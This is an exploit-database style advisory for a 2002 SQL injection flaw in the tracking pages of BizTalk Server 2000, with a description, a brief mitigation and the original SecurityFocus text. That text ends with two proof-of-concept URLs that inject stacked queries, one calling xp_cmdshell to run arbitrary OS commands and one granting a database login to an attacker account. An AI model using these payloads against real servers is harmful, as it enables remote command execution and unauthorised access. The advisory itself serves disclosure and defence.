SQL Injection in BizTalk Server

vendor:

BizTalk Server

by:

SecurityFocus

8.8

CVSS

HIGH

SQL Injection

CWE

Product Name: BizTalk Server

Affected Version From: BizTalk Server 2000

Affected Version To: BizTalk Server 2000

Patch Exists: YES

Related CWE: CVE-2002-0647

CPE: o:microsoft:biztalk_server_2000

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows

2002

SQL Injection in BizTalk Server

BizTalk Server is vulnerable to SQL injection attacks due to inadequate sanitization of user-supplied values for some parameters. A remote attacker can exploit this vulnerability by creating a malicious URL that includes specially crafted SQL queries to execute commands or compromise the database.

Mitigation:

Ensure that user-supplied values are properly sanitized before being used in SQL queries.

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/7470/info

A vulnerability has been reported for BizTalk Server which may make it possible for remote users to modify database query logic. The vulnerability exists in some of the pages used by the DTA interface.

This vulnerability may be the result of inadequate sanitization of user-supplied values for some parameters. A remote attacker may exploit this vulnerability by creating a malicious URL that includes specially crafted SQL queries to execute commands or compromise the database. 


http://server/biztalktracking/rawdocdata.asp?nDocumentKey=1,@tnDirection=1;execmaster.dbo.xp_cmdshell 'any OS command'--

http://server/biztalktracking/rawdocdata.asp?nDocumentKey=1,@tnDirection=1;execmaster.dbo.sp_grantlogin 'domain\attacker'--